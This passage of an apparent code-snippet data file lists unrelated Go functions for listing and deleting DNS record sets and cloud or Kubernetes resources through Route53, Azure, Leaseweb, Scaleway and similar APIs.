deleteAllResourcesForStack(stackname string) error {\n\treturn nil\n}", "func (m *MockClient) ListResourceRecordSets(arg0 *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", arg0)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (p *Provider) SetRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar updatedRecords []libdns.Record\n\n\tvar resourceRecordSets []LeasewebRecordSet\n\n\tfor _, record := range records {\n\n\t\trecordSet := LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tresourceRecordSets = append(resourceRecordSets, recordSet)\n\n\t\tupdatedRecords = append(updatedRecords, record)\n\t}\n\n\tbody := &LeasewebRecordSets{\n\t\tResourceRecordSets: resourceRecordSets,\n\t}\n\n\tbodyBuffer := new(bytes.Buffer)\n\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\treq, err := http.NewRequest(http.MethodPut, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\treturn updatedRecords, nil\n}", "func findRecordsToDelete(configrr *route53Zone, awsrr []*route53.ResourceRecordSet) []*route53.Change {\n\n\tvar diff []*route53.Change\n\tlen1 := len(awsrr)\n\tlen2 := len(configrr.ResourceRecordSets)\n\n\tfor i := 1; i < len1; i++ {\n\t\tvar j int\n\t\tfor j = 0; j < len2; j++ {\n\t\t\t// Ignore NS records, please do not delete these\n\t\t\tif aws.StringValue(awsrr[i].Type) == \"NS\" || aws.StringValue(awsrr[i].Type) == \"SOA\" {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\t// Find a match, short circuit and go to the next iteration\n\t\t\tif configrr.ResourceRecordSets[j].Name == aws.StringValue(awsrr[i].Name) &&\n\t\t\t\tconfigrr.ResourceRecordSets[j].Type == aws.StringValue(awsrr[i].Type) {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif j == len2 {\n\t\t\tdiff = append(diff, &route53.Change{Action: aws.String(\"DELETE\"), ResourceRecordSet: awsrr[i]})\n\t\t}\n\t}\n\n\treturn diff\n}", "func (p *Provider) GetRecords(ctx context.Context, zone string) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\treq, err := http.NewRequest(http.MethodGet, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\tdata, err := ioutil.ReadAll(res.Body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar recordSets LeasewebRecordSets\n\tjson.Unmarshal([]byte(data), &recordSets)\n\n\tvar records []libdns.Record\n\n\tfor _, resourceRecordSet := range recordSets.ResourceRecordSets {\n\t\tfor _, content := range resourceRecordSet.Content {\n\t\t\trecord := libdns.Record{\n\t\t\t\tName: resourceRecordSet.Name,\n\t\t\t\tValue: content,\n\t\t\t\tType: resourceRecordSet.Type,\n\t\t\t\tTTL: time.Duration(resourceRecordSet.TTL) * time.Second,\n\t\t\t}\n\t\t\trecords = append(records, record)\n\t\t}\n\t}\n\n\treturn records, nil\n}", "func (s *Store) ClearRecords() {\n\trawPath := \"/databroker_data\"\n\ts.delete(rawPath)\n}", "func ExampleAvailabilitySetsClient_Delete_availabilitySetDeleteMaximumSetGen() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armcompute.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\t_, err = clientFactory.NewAvailabilitySetsClient().Delete(ctx, \"rgcompute\", \"aaaaaaaaaaaaaaaaaaaa\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n}", "func (client IdentityClient) bulkDeleteResources(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodPost, \"/compartments/{compartmentId}/actions/bulkDeleteResources\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response BulkDeleteResourcesResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (r *deletedReconciler) deleteCreatedResources(ctx context.Context, name, namespace string) (err error) {\n\tlabelMap := map[string]string{\n\t\tOpsrcOwnerNameLabel: name,\n\t\tOpsrcOwnerNamespaceLabel: namespace,\n\t}\n\tlabelSelector := labels.SelectorFromSet(labelMap)\n\toptions := &client.ListOptions{LabelSelector: labelSelector}\n\n\t// Delete Catalog Source Configs\n\tcatalogSourceConfigs := &marketplace.CatalogSourceConfigList{}\n\terr = r.client.List(ctx, options, catalogSourceConfigs)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, catalogSourceConfig := range catalogSourceConfigs.Items {\n\t\tr.logger.Infof(\"Removing catalogSourceConfig %s from namespace %s\", catalogSourceConfig.Name, catalogSourceConfig.Namespace)\n\t\terr = r.client.Delete(ctx, &catalogSourceConfig)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn\n}", "func resourceKeboolaAWSRedShiftWriterTablesDelete(d *schema.ResourceData, meta interface{}) error {\n\tlog.Printf(\"[INFO] Clearing AWS RedShift Tables in Keboola: %s\", d.Id())\n\n\tclient := meta.(*KBCClient)\n\n\tgetWriterResponse, err := client.GetFromStorage(fmt.Sprintf(\"storage/components/keboola.wr-redshift-v2/configs/%s\", d.Id()))\n\n\tif hasErrors(err, getWriterResponse) {\n\n\t\treturn extractError(err, getWriterResponse)\n\t}\n\n\tvar awsredshiftWriter AWSRedShiftWriter\n\n\tdecoder := json.NewDecoder(getWriterResponse.Body)\n\terr = decoder.Decode(&awsredshiftWriter)\n\n\tif err != nil {\n\t\treturn err\n\n\t}\n\n\tvar emptyTables []AWSRedShiftWriterTable\n\tawsredshiftWriter.Configuration.Parameters.Tables = emptyTables\n\n\tvar emptyStorageTable []AWSRedShiftWriterStorageTable\n\tawsredshiftWriter.Configuration.Storage.Input.Tables = emptyStorageTable\n\n\tawsredshiftConfigJSON, err := json.Marshal(awsredshiftWriter.Configuration)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tclearAWSRedShiftTableForm := url.Values{}\n\tclearAWSRedShiftTableForm.Add(\"configuration\", string(awsredshiftConfigJSON))\n\tclearAWSRedShiftTableForm.Add(\"changeDescription\", \"Update AWSRedShift tables\")\n\n\tclearAWSRedShiftTablesBuffer := buffer.FromForm(clearAWSRedShiftTableForm)\n\n\tclearResponse, err := client.PutToStorage(fmt.Sprintf(\"storage/components/keboola.wr-redshift-v2/configs/%s\", d.Id()), clearAWSRedShiftTablesBuffer)\n\tif hasErrors(err, clearResponse) {\n\t\treturn extractError(err, clearResponse)\n\t}\n\tif hasErrors(err, clearResponse) {\n\t\treturn extractError(err, clearResponse)\n\t}\n\treturn nil\n}", "func (r *Reconciler) deleteAllCustomResource(ctx context.Context, csv *olmv1alpha1.ClusterServiceVersion, requestInstance *operatorv1alpha1.OperandRequest, csc *operatorv1alpha1.OperandConfig, operandName, namespace string) error {\n\n\tcustomeResourceMap := make(map[string]operatorv1alpha1.OperandCRMember)\n\tfor _, member := range requestInstance.Status.Members {\n\t\tif len(member.OperandCRList) != 0 {\n\t\t\tif member.Name == operandName {\n\t\t\t\tfor _, cr := range member.OperandCRList {\n\t\t\t\t\tcustomeResourceMap[member.Name+\"/\"+cr.Kind+\"/\"+cr.Name] = cr\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tmerr := &util.MultiErr{}\n\tvar (\n\t\twg sync.WaitGroup\n\t)\n\tfor index, opdMember := range customeResourceMap {\n\t\tcrShouldBeDeleted := unstructured.Unstructured{\n\t\t\tObject: map[string]interface{}{\n\t\t\t\t\"apiVersion\": opdMember.APIVersion,\n\t\t\t\t\"kind\": opdMember.Kind,\n\t\t\t\t\"metadata\": map[string]interface{}{\n\t\t\t\t\t\"name\": opdMember.Name,\n\t\t\t\t},\n\t\t\t},\n\t\t}\n\n\t\tvar (\n\t\t\toperatorName = strings.Split(index, \"/\")[0]\n\t\t\topdMember = opdMember\n\t\t)\n\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\tif err := r.deleteCustomResource(ctx, crShouldBeDeleted, requestInstance.Namespace); err != nil {\n\t\t\t\tr.Mutex.Lock()\n\t\t\t\tdefer r.Mutex.Unlock()\n\t\t\t\tmerr.Add(err)\n\t\t\t\treturn\n\t\t\t}\n\t\t\trequestInstance.RemoveMemberCRStatus(operatorName, opdMember.Name, opdMember.Kind, &r.Mutex)\n\t\t}()\n\t}\n\twg.Wait()\n\n\tif len(merr.Errors) != 0 {\n\t\treturn merr\n\t}\n\n\tservice := csc.GetService(operandName)\n\tif service == nil {\n\t\treturn nil\n\t}\n\talmExamples := csv.GetAnnotations()[\"alm-examples\"]\n\tklog.V(2).Info(\"Delete all the custom resource from Subscription \", service.Name)\n\n\t// Create a slice for crTemplates\n\tvar almExamplesRaw []interface{}\n\n\t// Convert CR template string to slice\n\terr := json.Unmarshal([]byte(almExamples), &almExamplesRaw)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"failed to convert alm-examples in the Subscription %s to slice\", service.Name)\n\t}\n\n\t// Merge OperandConfig and ClusterServiceVersion alm-examples\n\tfor _, crFromALM := range almExamplesRaw {\n\n\t\t// Get CR from the alm-example\n\t\tvar crTemplate unstructured.Unstructured\n\t\tcrTemplate.Object = crFromALM.(map[string]interface{})\n\t\tcrTemplate.SetNamespace(namespace)\n\t\tname := crTemplate.GetName()\n\t\t// Get the kind of CR\n\t\tkind := crTemplate.GetKind()\n\t\t// Delete the CR\n\t\tfor crdName := range service.Spec {\n\n\t\t\t// Compare the name of OperandConfig and CRD name\n\t\t\tif strings.EqualFold(kind, crdName) {\n\t\t\t\terr := r.Client.Get(ctx, types.NamespacedName{\n\t\t\t\t\tName: name,\n\t\t\t\t\tNamespace: namespace,\n\t\t\t\t}, &crTemplate)\n\t\t\t\tif err != nil && !apierrors.IsNotFound(err) {\n\t\t\t\t\tmerr.Add(err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif apierrors.IsNotFound(err) {\n\t\t\t\t\tklog.V(2).Info(\"Finish Deleting the CR: \" + kind)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif checkLabel(crTemplate, map[string]string{constant.OpreqLabel: \"true\"}) {\n\t\t\t\t\twg.Add(1)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\tdefer wg.Done()\n\t\t\t\t\t\tif err := r.deleteCustomResource(ctx, crTemplate, namespace); err != nil {\n\t\t\t\t\t\t\tr.Mutex.Lock()\n\t\t\t\t\t\t\tdefer r.Mutex.Unlock()\n\t\t\t\t\t\t\tmerr.Add(err)\n\t\t\t\t\t\t}\n\t\t\t\t\t}()\n\t\t\t\t}\n\n\t\t\t}\n\n\t\t}\n\t}\n\twg.Wait()\n\tif len(merr.Errors) != 0 {\n\t\treturn merr\n\t}\n\n\treturn nil\n}", "func (s *FastDNSv2Service) GetZoneRecordSets(ctx context.Context, zone string, opt *ListZoneRecordSetOptions) (*ListZoneRecordSets, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/recordsets\", zone)\n\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar z *ListZoneRecordSets\n\tresp, err := s.client.Do(ctx, req, &z)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn z, resp, nil\n}", "func (client ReferenceDataSetsClient) DeletePreparer(ctx context.Context, resourceGroupName string, environmentName string, referenceDataSetName string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"environmentName\": autorest.Encode(\"path\", environmentName),\n\t\t\"referenceDataSetName\": autorest.Encode(\"path\", referenceDataSetName),\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2020-05-15\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsDelete(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.TimeSeriesInsights/environments/{environmentName}/referenceDataSets/{referenceDataSetName}\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func (c DNSRecordSetClient) Delete(ctx context.Context, zoneID string, name string, recordType string) error {\n\tresourceGroupName, zoneName := resourceGroupAndZoneNames(zoneID)\n\trelativeRecordSetName, err := getRelativeRecordSetName(name, zoneName)\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, err = c.client.Delete(ctx, resourceGroupName, zoneName, relativeRecordSetName, dns.RecordType(recordType), \"\")\n\treturn ignoreAzureNotFoundError(err)\n}", "func (r *ChartReconciler) deleteExternalResources(instance *stablev1.Chart) error {\n\tfor _, resource := range instance.Status.Resource {\n\t\tu := &unstructured.Unstructured{}\n\t\tu.Object = map[string]interface{}{\n\t\t\t\"metadata\": map[string]interface{}{\n\t\t\t\t\"name\": resource.Name,\n\t\t\t\t\"namespace\": resource.Namespace,\n\t\t\t},\n\t\t}\n\t\tkey, err := client.ObjectKeyFromObject(u)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tu.SetGroupVersionKind(resource.GroupVersionKind())\n\t\tif err := r.Get(ctx, key, u); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := r.Delete(ctx, u); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (s *API) ClearDNSZoneRecords(req *ClearDNSZoneRecordsRequest, opts ...scw.RequestOption) (*ClearDNSZoneRecordsResponse, error) {\n\tvar err error\n\n\tif fmt.Sprint(req.DNSZone) == \"\" {\n\t\treturn nil, errors.New(\"field DNSZone cannot be empty in request\")\n\t}\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"DELETE\",\n\t\tPath: \"/domain/v2alpha2/dns-zones/\" + fmt.Sprint(req.DNSZone) + \"/records\",\n\t\tHeaders: http.Header{},\n\t}\n\n\tvar resp ClearDNSZoneRecordsResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func (mdb *db) DeleteAllFromSignalsRequestedSets(\n\tctx context.Context,\n\tfilter sqlplugin.SignalsRequestedSetsAllFilter,\n) (sql.Result, error) {\n\treturn mdb.conn.ExecContext(ctx,\n\t\tdeleteAllSignalsRequestedSetQry,\n\t\tfilter.ShardID,\n\t\tfilter.NamespaceID,\n\t\tfilter.WorkflowID,\n\t\tfilter.RunID,\n\t)\n}", "func (c *CLI) DeleteResources(filePath string) (string, error) {\n\tvar request deleteListRequest\n\tif err := fileutil.LoadFile(filePath, &request); err != nil {\n\t\treturn \"\", nil\n\t}\n\n\tfor _, r := range request.List {\n\t\tif _, err := c.DeleteResource(r.Kind, r.Data.UUID); err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t}\n\n\treturn \"\", nil\n}", "func cleanupClusterResources(ctx context.Context, clientset kubernetes.Interface, clusterName, namespace string) error {\n\tlistOpts := metav1.ListOptions{\n\t\tLabelSelector: \"multi-cluster=true\",\n\t}\n\n\t// clean up secrets\n\tsecretList, err := clientset.CoreV1().Secrets(namespace).List(ctx, listOpts)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif secretList != nil {\n\t\tfor _, s := range secretList.Items {\n\t\t\tfmt.Printf(\"Deleting Secret: %s in cluster %s\\n\", s.Name, clusterName)\n\t\t\tif err := clientset.CoreV1().Secrets(namespace).Delete(ctx, s.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// clean up service accounts\n\tserviceAccountList, err := clientset.CoreV1().ServiceAccounts(namespace).List(ctx, listOpts)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif serviceAccountList != nil {\n\t\tfor _, sa := range serviceAccountList.Items {\n\t\t\tfmt.Printf(\"Deleting ServiceAccount: %s in cluster %s\\n\", sa.Name, clusterName)\n\t\t\tif err := clientset.CoreV1().ServiceAccounts(namespace).Delete(ctx, sa.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// clean up roles\n\troleList, err := clientset.RbacV1().Roles(namespace).List(ctx, listOpts)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tfor _, r := range roleList.Items {\n\t\tfmt.Printf(\"Deleting Role: %s in cluster %s\\n\", r.Name, clusterName)\n\t\tif err := clientset.RbacV1().Roles(namespace).Delete(ctx, r.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\t// clean up roles\n\troles, err := clientset.RbacV1().Roles(namespace).List(ctx, listOpts)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif roles != nil {\n\t\tfor _, r := range roles.Items {\n\t\t\tfmt.Printf(\"Deleting Role: %s in cluster %s\\n\", r.Name, clusterName)\n\t\t\tif err := clientset.RbacV1().Roles(namespace).Delete(ctx, r.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// clean up role bindings\n\troleBindings, err := clientset.RbacV1().RoleBindings(namespace).List(ctx, listOpts)\n\tif !errors.IsNotFound(err) && err != nil {\n\t\treturn err\n\t}\n\n\tif roleBindings != nil {\n\t\tfor _, crb := range roleBindings.Items {\n\t\t\tfmt.Printf(\"Deleting RoleBinding: %s in cluster %s\\n\", crb.Name, clusterName)\n\t\t\tif err := clientset.RbacV1().RoleBindings(namespace).Delete(ctx, crb.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// clean up cluster role bindings\n\tclusterRoleBindings, err := clientset.RbacV1().ClusterRoleBindings().List(ctx, listOpts)\n\tif !errors.IsNotFound(err) && err != nil {\n\t\treturn err\n\t}\n\n\tif clusterRoleBindings != nil {\n\t\tfor _, crb := range clusterRoleBindings.Items {\n\t\t\tfmt.Printf(\"Deleting ClusterRoleBinding: %s in cluster %s\\n\", crb.Name, clusterName)\n\t\t\tif err := clientset.RbacV1().ClusterRoleBindings().Delete(ctx, crb.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\t// clean up cluster roles\n\tclusterRoles, err := clientset.RbacV1().ClusterRoles().List(ctx, listOpts)\n\tif !errors.IsNotFound(err) && err != nil {\n\t\treturn err\n\t}\n\n\tif clusterRoles != nil {\n\t\tfor _, cr := range clusterRoles.Items {\n\t\t\tfmt.Printf(\"Deleting ClusterRole: %s in cluster %s\\n\", cr.Name, clusterName)\n\t\t\tif err := clientset.RbacV1().ClusterRoles().Delete(ctx, cr.Name, metav1.DeleteOptions{}); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func ExampleDatasetsClient_Delete() {\n\tcred, err := azidentity.NewDefaultAzureCredential(nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to obtain a credential: %v\", err)\n\t}\n\tctx := context.Background()\n\tclientFactory, err := armdatafactory.NewClientFactory(\"<subscription-id>\", cred, nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to create client: %v\", err)\n\t}\n\t_, err = clientFactory.NewDatasetsClient().Delete(ctx, \"exampleResourceGroup\", \"exampleFactoryName\", \"exampleDataset\", nil)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to finish the request: %v\", err)\n\t}\n}", "func getHostedZoneRecords(svc *route53.Route53, zone *string) (*route53.ListResourceRecordSetsOutput, error) {\n\n\trrInput := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: zone,\n\t}\n\thostedZoneRecordSets, err := svc.ListResourceRecordSets(rrInput)\n\n\tif err != nil {\n\t\tfmt.Printf(\"error obtaining hosted zone %s by id: %s\", aws.StringValue(zone), err)\n\t\treturn nil, err\n\t}\n\n\treturn hostedZoneRecordSets, nil\n}", "func (s *API) ClearDNSZoneRecords(req *ClearDNSZoneRecordsRequest, opts ...scw.RequestOption) (*ClearDNSZoneRecordsResponse, error) {\n\tvar err error\n\n\tif fmt.Sprint(req.DNSZone) == \"\" {\n\t\treturn nil, errors.New(\"field DNSZone cannot be empty in request\")\n\t}\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"DELETE\",\n\t\tPath: \"/domain/v2beta1/dns-zones/\" + fmt.Sprint(req.DNSZone) + \"/records\",\n\t\tHeaders: http.Header{},\n\t}\n\n\tvar resp ClearDNSZoneRecordsResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func (client *RecordSetsClient) deleteCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, recordType RecordType, relativeRecordSetName string, options *RecordSetsDeleteOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/{recordType}/{relativeRecordSetName}\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif recordType == \"\" {\n\t\treturn nil, errors.New(\"parameter recordType cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{recordType}\", url.PathEscape(string(recordType)))\n\tif relativeRecordSetName == \"\" {\n\t\treturn nil, errors.New(\"parameter relativeRecordSetName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{relativeRecordSetName}\", relativeRecordSetName)\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodDelete, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\tif options != nil && options.IfMatch != nil {\n\t\treq.Header.Set(\"If-Match\", *options.IfMatch)\n\t}\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (m *Mockclient) DeleteRecordSet(arg0 context.Context, arg1, arg2 string, arg3 privatedns.RecordType, arg4 string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DeleteRecordSet\", arg0, arg1, arg2, arg3, arg4)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func DeleteRuleset(rulesetMap map[string]string) (err error) {\n uuid := rulesetMap[\"uuid\"]\n name := rulesetMap[\"name\"]\n rulesetFolderName := strings.Replace(name, \" \", \"_\", -1)\n\n localRulesetFiles, err := utils.GetKeyValueString(\"ruleset\", \"localRulesets\")\n if err != nil {\n logs.Error(\"DeleteRuleset Error getting data from main.conf for load data: \" + err.Error())\n return err\n }\n\n //delete LOG for scheduler\n err = ndb.DeleteSchedulerLog(uuid)\n if err != nil {\n logs.Error(\"Error deleting LOG DeleteSchedulerLog: \" + err.Error())\n return err\n }\n\n //delete scheduler\n schedulerUUID, err := ndb.GetSchedulerByValue(uuid)\n if err != nil {\n logs.Error(\"Error getting scheduler uuid GetSchedulerByValue: \" + err.Error())\n return err\n }\n\n err = ndb.DeleteScheduler(schedulerUUID)\n if err != nil {\n logs.Error(\"Error deleting scheduler uuid DeleteSchedulerLog: \" + err.Error())\n return err\n }\n\n //delete ruleset\n err = ndb.DeleteRulesetByUniqueid(uuid)\n if err != nil {\n logs.Error(\"DeleteRulesetByUniqueid -> ERROR deleting ruleset: \" + err.Error())\n return err\n }\n\n //delete a node ruleset\n err = ndb.DeleteRulesetNodeByUniqueid(uuid)\n if err != nil {\n logs.Error(\"DeleteRulesetNodeByUniqueid -> ERROR deleting ruleset: \" + err.Error())\n return err\n }\n\n //select all groups\n groups, err := ndb.GetAllGroups()\n if err != nil {\n logs.Error(\"DeleteRulesetNodeByUniqueid -> ERROR getting all groups: \" + err.Error())\n return err\n }\n groupsRulesets, err := ndb.GetAllGroupRulesets()\n if err != nil {\n logs.Error(\"DeleteRulesetNodeByUniqueid -> ERROR getting all grouprulesets: \" + err.Error())\n return err\n }\n for id := range groups {\n for grid := range groupsRulesets {\n if groupsRulesets[grid][\"groupid\"] == id && groupsRulesets[grid][\"rulesetid\"] == uuid {\n //delete a node ruleset\n err = ndb.DeleteGroupRulesetByValue(\"groupid\", id)\n if err != nil {\n logs.Error(\"DeleteRulesetNodeByUniqueid -> ERROR deleting grouprulesets: \" + err.Error())\n return err\n }\n err = ndb.DeleteGroupRulesetByValue(\"rulesetid\", uuid)\n if err != nil {\n logs.Error(\"DeleteRulesetNodeByUniqueid -> ERROR deleting grouprulesets: \" + err.Error())\n return err\n }\n }\n }\n\n }\n\n //delete ruleset from path\n err = os.RemoveAll(localRulesetFiles + rulesetFolderName)\n if err != nil {\n logs.Error(\"DB DeleteRuleset/rm -> ERROR deleting ruleset from their path...\")\n return errors.New(\"DB DeleteRuleset/rm -> ERROR deleting ruleset from their path...\")\n }\n\n //delete all ruleset source rules for specific uuid\n rules, err := ndb.GetRulesFromRuleset(uuid)\n if err != nil {\n logs.Error(\"GetRulesFromRuleset -> ERROR getting all rule_files for delete local ruleset: \" + err.Error())\n return err\n }\n for sourceUUID := range rules {\n err = ndb.DeleteRuleFilesByUuid(sourceUUID)\n if err != nil {\n logs.Error(\"DeleteRuleFilesByUuid -> ERROR deleting all local ruleset rule files associated: \" + err.Error())\n return err\n }\n }\n\n //update to nil group ruleset\n rulesetsForGroups, err := ndb.GetAllGroupsBValue(uuid)\n if err != nil {\n logs.Error(\"GetAllGroupsBValue -> ERROR getting all groups by ruleset uuid: \" + err.Error())\n return err\n }\n for y := range rulesetsForGroups {\n err = ndb.UpdateGroupValue(y, \"ruleset\", \"\")\n if err != nil {\n logs.Error(\"Error updating to null rulesets into group table: \" + err.Error())\n return err\n }\n err = ndb.UpdateGroupValue(y, \"rulesetID\", \"\")\n if err != nil {\n logs.Error(\"Error updating to null rulesetsID into group table: \" + err.Error())\n return err\n }\n }\n\n return nil\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), arg0)\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(input interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), input)\n}", "func (impl *Server) DeleteServerCollection() ([]base.ModelInterface, []base.ModelInterface, *base.ErrorResponse) {\n\tvar (\n\t\tname = impl.TemplateImpl.ResourceName()\n\t\trecordCollection = 